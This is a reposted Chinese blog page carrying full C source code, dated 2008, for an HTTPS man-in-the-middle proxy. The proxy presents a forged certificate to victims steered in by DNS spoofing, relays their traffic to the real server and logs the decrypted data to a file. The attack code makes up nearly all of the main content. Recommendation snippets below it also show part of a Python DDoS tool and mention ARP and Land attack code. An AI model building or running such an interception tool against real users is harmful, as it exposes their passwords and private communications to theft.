HTTPS中间人攻击源代码(08年代码)

最新推荐文章于 2021-05-26 08:02:02 发布
最新推荐文章于 2021-05-26 08:02:02 发布
阅读量970 收藏 1
点赞数
转自: http://www.yuanma.org/data/2007/0126/article_2183.htm 
 
by 云舒   
一段测试性质的代码,自己做一个伪造的证书,然后使用DNS SPOOF 引导被攻击者访问攻击者机器,攻击者作为中间人记录明文的数据传输。附件里面是我测试时使用的伪造的证书,使用OPENSSL生成的。  
 
代码:  
#include <stdio.h>  
#include <winsock2.h>  
#include <openssl/ssl.h>  
#include <openssl/err.h>  
 
#pragma comment ( lib, "libeay32.lib" )  
#pragma comment ( lib, "ssleay32.lib" )  
#pragma comment ( lib, "ws2_32.lib" )  
 
#define    PRIVATE_KEY_PWD        "1234"  
#define    CERT_FILE            "yunshu.crt"  
#define    KEY_FILE            "yunshu.key"  
#define    MAX_USER            10  
#define    LISTEN_PORT            443  
#define    TIME_OUT            1000000    // 1秒  
 
#define    DEBUG  
 
#ifdef DEBUG  
    #define    LOG_FILE            "c:\https.txt"  
    // 记录数据到文件  
    void    Log_File( char *str );  
#endif  
 
 
// 目的主机  
char            target_host[20] = { 0 };  
unsigned int    target_port = 0;  
 
// 输出SSL错误函数  
void    SSL_Error( char *custom_string );  
 
 
// 初始化SSL库作为服务端  
SSL        *Server_SSL_Init( );  
 
// 初始化SSL库作为客户端  
SSL        *Client_SSL_Init( );  
 
// 初始化Socket作为服务端  
SOCKET    Server_Socket_Init( );  
 
// 初始化Socket作为客户端  
SOCKET    Client_Socket_Init( );  
 
// 处理客户端函数  
void    WINAPI    FowardPacket( LPVOID argument );  
 
// 程序入口,主函数  
int main( int argc, char *argv[] )  
{  
    if( argc != 3 )  
    {  
        printf( "Usage: %s   <target_host>   <target_port>\n", argv[0] );  
        printf( "Code by 云舒,just for test!\n" );  
 
        return -1;  
    }  
 
    SOCKET    server_sock = Server_Socket_Init( );  
    if( INVALID_SOCKET == server_sock )  
    {  
        return -1;  
    }  
      
    // 加载加密算法库  
    SSL_library_init( );  
 
    // 加载错误信息库  
    SSL_load_error_strings( );  
 
    // 开始接受连接  
    SOCKET            client_sock;        // 来自被攻击者的socket  
    SOCKADDR_IN        client_sin;  
    int                sin_len = sizeof(SOCKADDR_IN);  
 
    target_port = atoi( argv[2] );  
    struct hostent *phost = gethostbyname( argv[1] );  
    if( phost == NULL )  
    {  
        printf( "Resolve %s error!\n" , argv[1] );  
        return -1;  
    }  
    memset( (void *)&client_sin, 0, sizeof(SOCKADDR_IN) );  
    memcpy( &client_sin.sin_addr , phost->h_addr_list[0] , phost->h_length );  
    strcpy( target_host, inet_ntoa( client_sin.sin_addr ) );  
    printf( "Target host is %s(%s), port is %d\n", target_host, argv[1], target_port );  
 
    memset( (void *)&client_sin, 0, sizeof(SOCKADDR_IN) );  
    while( TRUE )  
    {  
        client_sock = accept( server_sock, (struct sockaddr *)&client_sin, &sin_len );  
 
        printf( "connect from %s\n", inet_ntoa( client_sin.sin_addr ) );  
          
        if( SOCKET_ERROR == client_sock )  
        {  
            printf( "accept error.\n" );  
            continue;  
        }  
 
        HANDLE    h_thread;  
        DWORD    thread_id = 0;  
 
        h_thread = CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)FowardPacket, (LPVOID)&client_sock, 0, &thread_id );  
        if( NULL == h_thread )  
        {  
            printf( "create thread error.\n" );  
        }  
 
        CloseHandle( h_thread );  
    }  
 
    closesocket( server_sock );      
    WSACleanup( );  
 
    return 0;  
}  
 
void WINAPI FowardPacket( LPVOID argument )  
{  
    char    buffer[2048] = { 0 };  
 
    // 生成SSL,作为服务端,响应被攻击者的请求  
    SSL    *server_ssl = Server_SSL_Init( );  
    if( NULL == server_ssl )  
    {  
        return;  
    }  
 
    printf( "Init ssl as server success!\n" );  
 
    // 生成SSL,作为客户端,向真实主机发起请求  
    SSL    *client_ssl = Client_SSL_Init( );  
    if( NULL == client_ssl )  
    {  
        return;  
    }  
 
    printf( "Init ssl as client success!\n" );  
 
    // 作为服务端端的socket,响应被攻击者的请求  
    SOCKET    server_sock = (SOCKET)(*(SOCKET *)argument);  
 
    // 绑定ssl和socket,此处作为被攻击者的服务器  
    SSL_set_fd( server_ssl, server_sock );  
 
    int ret = SSL_accept( server_ssl );  
    if( -1 == ret )  
    {  
        SSL_Error( "SSL_accept error" );  
        return;  
    }  
 
    // 作为客户端的socket,向真实主机发起请求  
    SOCKET    client_sock = Client_Socket_Init( );  
    if( INVALID_SOCKET == client_sock )  
    {  
        return;  
    }  
      
    SSL_set_fd( client_ssl, client_sock );  
    ret = SSL_connect( client_ssl );  
    if( -1 == ret )  
    {  
        SSL_Error( "SSL_connect error" );  
        return;  
    }  
 
    fd_set    fd_read;  
    timeval    time_out;  
 
    while( TRUE )  
    {  
        time_out.tv_sec = 0;  
        time_out.tv_usec = TIME_OUT;  
 
        FD_ZERO( &fd_read );  
        FD_SET( server_sock, &fd_read );  
        FD_SET( client_sock, &fd_read );  
 
        ret = select( 0, &fd_read, NULL, NULL, &time_out );  
        if( SOCKET_ERROR == ret )  
        {  
            printf( "socket error: %d\n", GetLastError() );  
            break;  
        }  
        else if( 0 == ret )  
        {  
            continue;  
        }  
        else  
        {  
            if( FD_ISSET( server_sock, &fd_read ) )  
            {  
                memset( (void *)buffer, 0, sizeof(buffer) );  
 
                ret = SSL_read( server_ssl, buffer, sizeof(buffer) );  
                if( ret > 0 )  
                {  
                    ret = SSL_write( client_ssl, buffer, strlen(buffer) );  
                    if( strlen(buffer) != ret )  
                    {  
                        SSL_Error( "Send data to real server error" );  
                    }  
                    else  
                    {  
                        printf( "send %d bytes to real server\n", ret );  
                          
                        #ifdef DEBUG  
                            Log_File( buffer );  
                        #endif  
                    }  
                }  
            }  
            else if( FD_ISSET( client_sock, &fd_read ) )  
            {  
                memset( (void *)buffer, 0, sizeof(buffer) );  
 
                ret = SSL_read( client_ssl, buffer, sizeof(buffer) );  
                if( ret > 0 )  
                {  
                    //printf( "RESPONSE:\n\t%s\n", buffer );  
 
                    ret = SSL_write( server_ssl, buffer, strlen(buffer) );  
                    if( strlen(buffer) != ret )  
                    {  
                        SSL_Error( "Send data to customer error" );  
                    }  
                    else  
                    {  
                        printf( "send %d bytes to customer's host\n", ret );  
                          
                        #ifdef DEBUG  
                            Log_File( buffer );  
                        #endif  
                    }  
                }  
            }  
        }  
    }  
      
    SSL_shutdown( server_ssl );  
    SSL_shutdown( client_ssl );  
    SSL_free( server_ssl );  
    SSL_free( client_ssl );  
 
    closesocket( server_sock );  
    closesocket( client_sock );  
 
    return;  
}  
 
void SSL_Error( char *custom_string )  
{  
    char    error_buffer[256] = { 0 };  
      
    printf( "%s, ", custom_string );  
    ERR_error_string( ERR_get_error(), error_buffer );  
    printf( "%s\n", error_buffer );  
}  
 
SSL    *Server_SSL_Init( )  
{  
    // 加载SSL环境  
    SSL_CTX    *server_ctx = SSL_CTX_new( SSLv23_server_method() );  
    if( NULL == server_ctx )  
    {  
        SSL_Error( "Init ssl ctx error" );  
        return NULL;  
    }  
 
    // 设置证书文件的口令  
    SSL_CTX_set_default_passwd_cb_userdata( server_ctx, PRIVATE_KEY_PWD );  
 
    // 加载证书  
    if( SSL_CTX_use_certificate_file( server_ctx, CERT_FILE, SSL_FILETYPE_PEM ) <= 0 )  
    {  
        SSL_Error( "Load cert file error" );  
        return NULL;  
    }  
 
    // 加载私钥  
    if( SSL_CTX_use_PrivateKey_file( server_ctx, KEY_FILE, SSL_FILETYPE_PEM ) <= 0 )  
    {  
        SSL_Error( "Load cert file error" );  
        return NULL;  
    }  
 
    // 检查私钥和证书是否匹配  
    if( !SSL_CTX_check_private_key( server_ctx ) )  
    {  
        printf( "Private key does not match the certificate public key\n" );  
        return NULL;  
    }  
 
    SSL    *ssl = SSL_new (server_ctx);  
    if( NULL == ssl )  
    {  
        SSL_Error( "Create ssl error" );  
        return NULL;  
    }  
 
    return ssl;  
}  
 
SSL    *Client_SSL_Init( )  
{  
    SSL_CTX    *client_ctx;  
 
    client_ctx = SSL_CTX_new( SSLv23_client_method() );  
 
    if( NULL == client_ctx )  
    {  
        SSL_Error( "Init ssl ctx error" );  
        return NULL;  
    }  
 
    SSL    *ssl = SSL_new (client_ctx);  
    if( NULL == ssl )  
    {  
        SSL_Error( "Create ssl error" );  
        return NULL;  
    }  
 
    return ssl;  
}  
 
SOCKET    Server_Socket_Init( )  
{  
    WSADATA        wsa;  
 
    WSAStartup( 0x0202, &wsa );  
      
    SOCKET    sock = socket( AF_INET, SOCK_STREAM, 0 );  
    if( INVALID_SOCKET == sock )  
    {  
        printf( "Create socket as a server error" );  
        return INVALID_SOCKET;  
    }  
 
    SOCKADDR_IN    server_sin;  
    memset( (void *)&server_sin, 0, sizeof(SOCKADDR_IN) );  
 
    server_sin.sin_family = AF_INET;  
    server_sin.sin_addr.S_un.S_addr = INADDR_ANY;  
    server_sin.sin_port = htons( 443 );  
 
    int    ret = bind( sock, (struct sockaddr *)&server_sin, sizeof(SOCKADDR_IN) );  
    if( SOCKET_ERROR == ret )  
    {  
        printf( "bind error: %d\n", GetLastError() );  
        return INVALID_SOCKET;  
    }  
 
    ret = listen( sock, MAX_USER );  
    if( SOCKET_ERROR == ret )  
    {  
        printf( "listen error.\n" );  
        return INVALID_SOCKET;  
    }  
 
    printf( "Listening on all local ip address, waiting for connect...\n" );  
 
    return sock;  
}  
 
SOCKET    Client_Socket_Init( )  
{  
    SOCKET    client_sock = socket( AF_INET, SOCK_STREAM, 0 );  
 
    if( INVALID_SOCKET == client_sock )  
    {  
        printf( "create socket as a client error.\n" );  
        return -1;  
    }  
      
    SOCKADDR_IN        client_sin;  
    memset( (void *)&client_sin, 0, sizeof(SOCKADDR_IN) );  
 
    client_sin.sin_family = AF_INET;  
    client_sin.sin_addr.S_un.S_addr = inet_addr( target_host );  
    client_sin.sin_port = htons( target_port );  
 
    int ret = connect( client_sock, (struct sockaddr *)&client_sin, sizeof(SOCKADDR_IN) );  
    if( SOCKET_ERROR == ret )  
    {  
        printf( "connect to real server %s error", target_host );  
        return INVALID_SOCKET;  
    }  
 
    printf( "connect to real server success!\n" );  
 
    return client_sock;  
}  
 
#ifdef    DEBUG  
void    Log_File( char * str )  
{  
    FILE    *fp = fopen( LOG_FILE, "w+" );  
    if( NULL == fp )  
    {  
        return;  
    }  
 
    fputs( str, fp );  
      
    fclose( fp );  
}  
#endif
newbix
关注
[网络安全自学篇] 七十一.深信服分享之外部威胁防护和勒索病毒对抗
杨秀璋的专栏
04-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前面三篇文章详细分享了WannaCry勒索病毒,包括病毒复现、IDA和OD逆向分析蠕虫传播、防护措施等,那么如何防护呢?所以,接下来这篇文章作者将分享来自深信服老师的《外部威胁防护和勒索病毒对抗》,带领大家看看知名安全厂商的威胁防护措施,包括网络安全面临的挑战、如何有效的应对挑战、深信服安全建设之道等。基础性文章,希望对您有所帮助,如果存在错误或不足之处,还望告知,加油!
[网络安全自学篇] 六十.Cracer第八期——(2)五万字总结Linux基础知识和常用渗透命令
热门推荐
杨秀璋的专栏
03-19 1万+
作为Web渗透的初学者,Linux基础知识和常用命令是我们的必备技能,本文详细讲解了Linux相关知识点及Web渗透免了高龄。如果想玩好Kali或渗透,你需要学好Linux及相关命令,以及端口扫描、漏洞利用、瑞士军刀等工具。安全领域通常分为网络安全(Web渗透)和系统安全(PWN逆向)两个方向。非常基础的一篇文章,希望能够帮助到您!
中间人攻击原码
09-15
该原码基于windows平台 c++ 经过测试运行无误
Android 中间人代理,Android 中间人攻击(示例代码)
weixin_28857713的博客
05-26 288
0x00Android中间人攻击的思路就是劫持局域网中被攻击机器和server间的对话。被攻击机器和server表面上工作正常,实际上已经被中间人劫持。能够从一张图来明确这个过程。受攻击主机发送的数据,首先经过了攻击者。从server返回的数据也经过攻击者,再发送给受攻击主机。0x01Android开源中间人攻击样例。请參考https://github.com/ssun125/Lanmitm。我们...
GitHub源码攻击事件
weixin_34146986的博客
05-23 253
2019独角兽企业重金招聘Python工程师标准>>> ...
常用的攻击软件源代码(c)
weixin_33860737的博客
11-03 343
Abstract这里有一些是老的,现在看来并没有用,但他们都很有名。 1 Land 攻击一台Win95的机器。这是Win95的一个漏洞,以其IP地址和端口向自己的同一个端口发起连接(发SYN),Win95即会崩溃。 /* land.c by m3lt, FLCcrashes a win95 box */ #include #include #include #include #includ...
Middleman-Template:基本中间人(http
05-06
中间人模板 使用的基本模板项目。 安装 将此存储~/.middleman为~/.middleman 。 不要克隆它的子目录~/.middleman为克隆它: ~/.middleman本身。 因此,命令如下所示: git clone git@github.com:webonise/Middleman-Template.git ~ /.middleman 用法 创建新的Middleman应用程序时,请使用以下命令: middleman init . --template=webonise npm install gulp install 目录结构 将HTML放在./source ,将Sass / CSS文件放在./source/css ,将CoffeeScript / JavaScript放在./source/js ,并将图像放在./source/img 。 中间人将构建到./build
软件License管理与代码保护技术概述
weixin_43907225的博客
02-20 6717
软件License管理与代码保护 第1章: License管理技术 1.1 数字权限管理 DRM 数字权限管理 DRM(Digital Rights Management)系统就是利用先进的信息技术,在提供数字化和网络化信息服务的同时,有效地阻止对这些信息的非法使用和拷贝,以达到保护数字知识产品知识产权的目的。以前,数字版权管理主要是利用安全和加密方法来解决非法拷贝的问题,即将信息内容的分布锁定和...
"EMDS算法与对称密码体制参数比较
埃及信息学杂志18(2017)141全文EMDS算法与几种对称密码体制的参数比较Mani Aroraa, Sandeep Sharmab,Derick Englesba印度旁遮普邦阿姆利则Khalsa学院b印度旁遮普邦阿姆利则Guru Nanak Dev大学阿提奇莱因福奥文章...
【2021-08-05 修订】【梳理】计算机网络:自顶向下方法 第六章 链路层和LAN(docx)
COFACTOR
12-29 2477
计算机网络 知 识 梳 理 (第一版) 建议先修课程:数据结构。 配套教材: Computer Networking - A Top Down Approach, 7th edition James F. Kurose, Keith W. Ross 参考书目: 1、计算机网络(第7版) 谢希仁 编著 高等教育出版社 链接:https://pan.baidu.com/s/1EBG7z0WNYpv3PzZXBmY5yg 提取码:0000 说明 由于时间关系,6.7 节的笔记暂时还没做。 六 链路层
C语言实现ARP攻击
03-21
利用C语言实现ARP攻击,完成了断开目标网络以及接受并转发目标流量的功能
zANTI2源码
06-08
zANTI 2.0 enhancements for community users now include: zPacketEditor – 用于中间人攻击(MITM)测试时可进行人工渗透测试 ICMP重定向 – 使用ICMP重定向支持全双工MITM MITM特性 – 可拦截下载、重定向URL图片替换和插入HTML Password复杂性审计 – 可使用大型、巨型和自定义字典进行暴力破解测试
SSL及HTTPS协议实例源码
05-13
SSL及HTTPS协议实例源码,java https server and ssl server.
易语言HTTPS访问网页模块源码
02-08
调用的DLL命令: .DLL命令 InternetOpenA, 整数型, "WinINet.dll" .参数 lpszAgent, 文本型 .参数 dwAccessType, 整数型 .参数 lpszProxyName, 文本型 .参数 lpszProxyBypass, 文本型 .参数 dwFlags, 整数型 .DLL命令 InternetCloseHandle, 逻辑型, "WinINet.dll" .参数 hInternet, 整数型 .DLL命令 InternetConnectA, 整数型, "WinINet.dll" .参数 hInternet, 整数型 .参数 lpszServerName, 文本型 .参数 nServerPort, 整数型 .参数 lpszUserName, 文本型 .参数 lpszPassword, 文本型 .参数 dwService, 整数型 .参数 dwFlags, 整数型 .参数 dwContext, 整数型 .DLL命令 HttpOpenRequestA, 整数型, "WinINet.dll" .参数 hConnect, 整数型 .参数 lpszVerb, 文本型 .参数 lpszObjectName, 文本型 .参数 lpszVersion, 文本型 .参数 lpszReferer, 文本型 .参数 lplpszAcceptTypes, 文本型 .参数 dwFlags, 整数型 .参数 dwContext, 整数型 .DLL命令 HttpSendRequestA, 逻辑型, "WinINet.dll" .参数 hRequest, 整数型 .参数 lpszHeaders, 文本型 .参数 dwHeadersLength, 整数型 .参数 lpOptional, 文本型 .参数 dwOptionalLength, 整数型 .DLL命令 InternetReadFile, 逻辑型, "WinINet.dll" .参数 hFile, 整数型 .参数 lpBuffer, 字节集, 传址 .参数 dwNumberOfBytesToRead, 整数型 .参数 lpdwNumberOfBytesRead, 整数型, 传址 .DLL命令 HttpQueryInfoA, 逻辑型, "WinINet.dll" .参数 hRequest, 整数型 .参数 dwInfoLevel, 整数型 .参数 lpvBuffer, 文本型, 传址 .参数 lpdwBufferLength, 整数型, 传址 .参数 lpdwIndex, 整数型 .DLL命令 InternetSetCookieA, 逻辑型, "WinINet.dll" .参数 lpszUrl, 文本型 .参数 lpszCookieName, 文本型 .参数 lpszCookieData, 文本型 .DLL命令 CreateThread, 整数型 .参数 lpThreadAttributes, 整数型 .参数 dwStackSize, 整数型 .参数 lpStartAddress, 子程序指针 .参数 lpParameter, 整数型 .参数 dwCreationFlags, 整数型 .参数 lpThreadId, 整数型, 传址 .DLL命令 CloseHandle, 逻辑型 .参数 hObject, 整数型 .DLL命令 TerminateThread, 逻辑型 .参数 hThread, 整数型 .参数 dwExitCode, 整数型 .DLL命令 MsgWaitForMultipleObjects, 整数型 .参数 nCount, 整数型 .参数 pHandles, 整数型, 传址 .参数 bWaitAll, 逻辑型 .参数 dwMilliseconds, 整数型 .参数 dwWakeMask, 整数型 .DLL命令 HttpAddRequestHeaders, , "wininet.dll", "HttpAddRequestHeadersA" .参数 hRequest, 整数型 .参数 lpszHeaders, 文本型, 传址 .参数 dwHeadersLength, 整数型 .参数 dwModifiers, 整数型
中间人攻击抓包
05-23
对301重定向到HTTPS前遭遇中间人攻击的抓包分析
Linux源码服务器遭到攻击有感
袁萌专栏
09-02 2266
<!-- @page {margin:2cm} p {margin-bottom:0.21cm} -->      根据国外媒体报道,近日Linux源码服务器受到攻击,Linux业界大惊。何故也?              8月29日早上(美国当
服务器被攻击了怎么办
oo1392696656的博客
11-22 710
游戏行业一直以来是网络攻击的重灾区,很多游戏刚上线没多久就频繁遭到攻击,导致玩家大量流失口碑下降,最后可能导致直接关服。安全DDoS高防技术团队通过多安全防护经验,总结了一下游戏服务器最容易遭到的攻击类型以及一些防御方法。 服务器入侵攻击 服务器入侵攻击是最严重的一种攻击方式了,攻击者入侵游戏服务器,修改、盗取游戏数据甚至直接清除游戏数据。最可怕的是有些服务器入侵是内容人员开发时自己留的后门,可...
pythonddos攻击代码_【分享】Python简易DDos攻击源码
weixin_39640008的博客
11-20 1534
[Python] 纯文本查看 复制代码import socketimport timeimport threading#Pressure Test,ddos tool#---------------------------MAX_CONN=20000PORT=80HOST=""#在双引号里输入对方IP或域名.PAGE="/index.php"#---------------------------...
网络安全——对简单服务器的攻击
HizT_1999的博客
06-24 1416
网络安全——对简单服务器的攻击 任务一:做一个服务端程序,其功能是:收到客户端请求之后,将请求中的字符串前后翻转,然后返回给客户端。 1.服务端程序 int main() { int listen_socket = Creat_socket(); int client_socket = wait_client(listen_socket); hanld_client(listen_socket, client_socket); close(lis
HTTPS工作原理与中间人攻击详解
中间人攻击HTTPS面临的一种威胁,它涉及到通信过程中数据被篡改或窃取的可能性。" HTTPS(Hypertext Transfer Protocol Secure)是一种基于HTTP协议的安全通信协议,它通过SSL/TLS(Secure Sockets Layer/...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值